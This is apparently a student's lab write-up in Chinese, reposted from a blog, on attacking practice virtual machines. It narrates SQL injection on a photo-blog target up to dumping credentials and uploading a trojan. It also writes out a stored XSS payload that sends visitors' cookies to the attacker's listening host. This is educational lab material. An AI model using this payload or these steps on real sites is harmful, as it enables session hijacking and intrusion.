码迷,mamicode.com
首页 > 其他好文 > 详细

实验五

时间:2018-11-03 02:23:08      阅读:234      评论:0      收藏:0      [点我收藏+]

标签:打开   .com   扫描端口   nbsp   技术分享   列表   虚拟机   kali   登陆   

一、sql注入靶机攻击

 

首先搭建虚拟机 kali扫描下当前网段

 技术分享图片

 

 使用nmap扫描端口

 技术分享图片

 

打开该虚拟机提供的网页可查看网页各信息

 技术分享图片

 

id=2后加一个引号,网页报错 说明该网站存在sql注入漏洞

 技术分享图片

 

使用order by语句试出网站后台数据库表的列数 1-4均显示正常网页如下图,当order by 5 时网页报错

 技术分享图片

技术分享图片

 

 

使用联合查询 查看网页的显示位

 技术分享图片

 

得到显示位就可以显示数据库的名字 photoblog

 技术分享图片

 

得到数据库名字 可以顺藤摸瓜查询数据库中的表

 技术分享图片

 

可得三列元素

 技术分享图片

 

查看user表中的数据得到用户名及密码

 技术分享图片

 

 

 

 技术分享图片

技术分享图片

 

 技术分享图片

 

 尝试登陆

 技术分享图片

技术分享图片

 

 

可尝试上传文件

 技术分享图片

技术分享图片

 

上传木马文件后得到目录列表可以对其进行进一步操作

 技术分享图片

 

二、xss靶机攻击

首先与上一个实验相同并打开网页

 技术分享图片

技术分享图片

技术分享图片

技术分享图片

技术分享图片

 

在靶机上留言<script>document.write(‘<img src="http://192.168.112.132/?‘+document.cookie+‘ "/>‘)</script>并在本机开启80端口监听

 技术分享图片

 

实验五

标签:打开   .com   扫描端口   nbsp   技术分享   列表   虚拟机   kali   登陆   

原文地址:https://www.cnblogs.com/P201521410037/p/9898845.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!